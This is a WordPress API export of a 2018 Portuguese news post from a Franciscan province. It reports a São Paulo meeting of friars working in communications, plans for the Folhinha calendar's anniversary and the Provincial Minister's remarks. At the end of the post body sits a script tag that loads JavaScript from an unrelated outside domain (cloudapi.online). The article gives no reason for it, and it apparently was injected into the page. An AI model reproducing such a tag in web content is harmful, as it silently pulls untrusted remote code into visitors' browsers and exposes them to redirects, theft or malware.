{"id":159212,"date":"2018-05-11T00:26:09","date_gmt":"2018-05-11T03:26:09","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=159212"},"modified":"2019-08-13T11:01:27","modified_gmt":"2019-08-13T14:01:27","slug":"encontro-dos-frades-que-compoe-a-frente-da-comunicacao","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html","title":{"rendered":"Encontro dos frades da Frente da Comunica\u00e7\u00e3o"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/comunicacao_090518.jpg\" alt=\"comunicacao_090518\" width=\"830\" height=\"400\" \/><\/p>\n<p><strong>Frei Augusto Luiz Gabriel<\/strong><\/p>\n<p><strong>S\u00e3o Paulo (SP) &#8211;<\/strong> A Frente de Evangeliza\u00e7\u00e3o da Comunica\u00e7\u00e3o se reuniu nos dias 8 e 9 de maio em S\u00e3o Paulo (SP). O encontro reuniu apenas os frades que trabalham diretamente com a Comunica\u00e7\u00e3o da Prov\u00edncia. O segundo encontro acontecer\u00e1 no segundo semestre e reunir\u00e1, al\u00e9m dos frades, os leigos que atuam nesta \u00e1rea. O tema do discernimento, da\u00a0Exorta\u00e7\u00e3o do Papa Francisco, <strong><em><a href=\"http:\/\/franciscanos.org.br\/?p=156394\" target=\"_blank\" rel=\"noopener noreferrer\">Gaudete et Exsultate<\/a><\/em><\/strong>, (par\u00e1grafos 166-177), serviu como base para as reflex\u00f5es e partilhas que foram feitas durante o encontro.<\/p>\n<p>Estiveram presentes Frei Neuri Reinisch e Frei Marcos Motta Brugger, da Rede Celinauta de Comunica\u00e7\u00e3o de Pato Branco (PR); Frei Volney Berkenbrock e Frei Edrian Josu\u00e9 Pasini, da Editora Vozes de Petr\u00f3polis (RJ); Frei M\u00e1rio Jos\u00e9 Knapik, do Grupo Educacional Bom Jesus de Curitiba (PR), Frei Roberto Carlos Nunes, da Funda\u00e7\u00e3o Frei Rog\u00e9rio de Curitibanos (SC), Frei Gustavo Medella, Definidor Provincial e coordenador da Frente e Frei Augusto Luiz Gabriel de S\u00e3o Paulo (SP).\u00a0 Tamb\u00e9m participaram do encontro Frei Fid\u00eancio Vanboemmel, Ministro Provincial e Frei C\u00e9sar K\u00fclkamp, Vig\u00e1rio Provincial.<\/p>\n<p>Nas partilhas percebeu-se que muitas conquistas j\u00e1 foram alcan\u00e7adas, por\u00e9m, in\u00fameros s\u00e3o os desafios e os trabalhos que ainda necessitam ser colocados em pr\u00e1tica.<\/p>\n<p><strong>Editora Vozes se prepara para os 80 anos da Folhinha<\/strong><\/p>\n<p>A\u00a0Folhinha do Sagrado Cora\u00e7\u00e3o de Jesus ir\u00e1 completar 80 anos de exist\u00eancia em 2019. Para comemorar esta data especial, Frei Edrian conta que est\u00e3o sendo preparadas muitas novidades.\u00a0Segundo ele, a famosa Folhinha chega a todos os cantos e a todos os tipos de gente, at\u00e9 mesmo em cen\u00e1rios de novelas. \u201cNos principais pontos de venda est\u00e3o sendo montados pain\u00e9is com todas as estampas da Folhinha\u201d, adiantou o frade, que h\u00e1 muitos anos \u00e9 coordenador dos trabalhos da Folhinha do Sagrado Cora\u00e7\u00e3o na Editora Vozes.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/comunicacao_090518_1.jpg\" alt=\"comunicacao_090518_1\" width=\"830\" height=\"400\" \/><\/p>\n<p>Frei Gustavo lembrou o Programa de Forma\u00e7\u00e3o Geral, que \u00e9 uma nova iniciativa para forma\u00e7\u00e3o e intera\u00e7\u00e3o dos membros da Frente. O encontro acontece atrav\u00e9s de videoconfer\u00eancia, visando facilitar a participa\u00e7\u00e3o de todos e \u00e9 realizado sempre na primeira quarta-feira de cada m\u00eas. O pr\u00f3ximo encontro acontecer\u00e1 no dia 6 de junho e contar\u00e1 com a assessoria de Frei Claudino Gilz, professor de Ensino Religioso do Grupo Educacional Bom Jesus.<\/p>\n<p>Em sua fala, o Ministro Provincial destacou o importante papel da Comunica\u00e7\u00e3o nas diversas institui\u00e7\u00f5es. \u201cSe temos uma estrutura, seja das r\u00e1dios, TV, Universidades, como tamb\u00e9m da Editora, precisamos sempre zelar pela constru\u00e7\u00e3o duma evangeliza\u00e7\u00e3o de qualidade, que difunda ideias e que forme consci\u00eancias cr\u00edticas\u201d, afirmou Frei Fid\u00eancio. \u201cSomos art\u00edfices dessa constru\u00e7\u00e3o\u201d, completou.<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Frentes de Evangeliza\u00e7\u00e3o da Prov\u00edncia<\/p>\n","protected":false},"author":5,"featured_media":192486,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[545,451,52],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Encontro dos frades da Frente da Comunica\u00e7\u00e3o - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Encontro dos frades da Frente da Comunica\u00e7\u00e3o - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Frentes de Evangeliza\u00e7\u00e3o da Prov\u00edncia\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-11T03:26:09+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-08-13T14:01:27+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/comunicacao_encontro.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"330\" \/>\n\t<meta property=\"og:image:height\" content=\"219\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"freiaugusto\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"freiaugusto\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/comunicacao_encontro.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/comunicacao_encontro.jpg\",\"width\":330,\"height\":219},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html\",\"name\":\"Encontro dos frades da Frente da Comunica\u00e7\u00e3o - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html#primaryimage\"},\"datePublished\":\"2018-05-11T03:26:09+00:00\",\"dateModified\":\"2019-08-13T14:01:27+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Encontro dos frades da Frente da Comunica\u00e7\u00e3o\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91\",\"name\":\"freiaugusto\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g\",\"caption\":\"freiaugusto\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/freiaugusto\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Encontro dos frades da Frente da Comunica\u00e7\u00e3o - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html","og_locale":"pt_BR","og_type":"article","og_title":"Encontro dos frades da Frente da Comunica\u00e7\u00e3o - Not\u00edcias - Franciscanos","og_description":"Frentes de Evangeliza\u00e7\u00e3o da Prov\u00edncia","og_url":"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-05-11T03:26:09+00:00","article_modified_time":"2019-08-13T14:01:27+00:00","og_image":[{"width":330,"height":219,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/comunicacao_encontro.jpg","type":"image\/jpeg"}],"author":"freiaugusto","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"freiaugusto","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/comunicacao_encontro.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/05\/comunicacao_encontro.jpg","width":330,"height":219},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html","name":"Encontro dos frades da Frente da Comunica\u00e7\u00e3o - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html#primaryimage"},"datePublished":"2018-05-11T03:26:09+00:00","dateModified":"2019-08-13T14:01:27+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/encontro-dos-frades-que-compoe-a-frente-da-comunicacao.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Encontro dos frades da Frente da Comunica\u00e7\u00e3o"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91","name":"freiaugusto","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g","caption":"freiaugusto"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/freiaugusto"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/159212"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=159212"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/159212\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/192486"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=159212"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=159212"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=159212"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}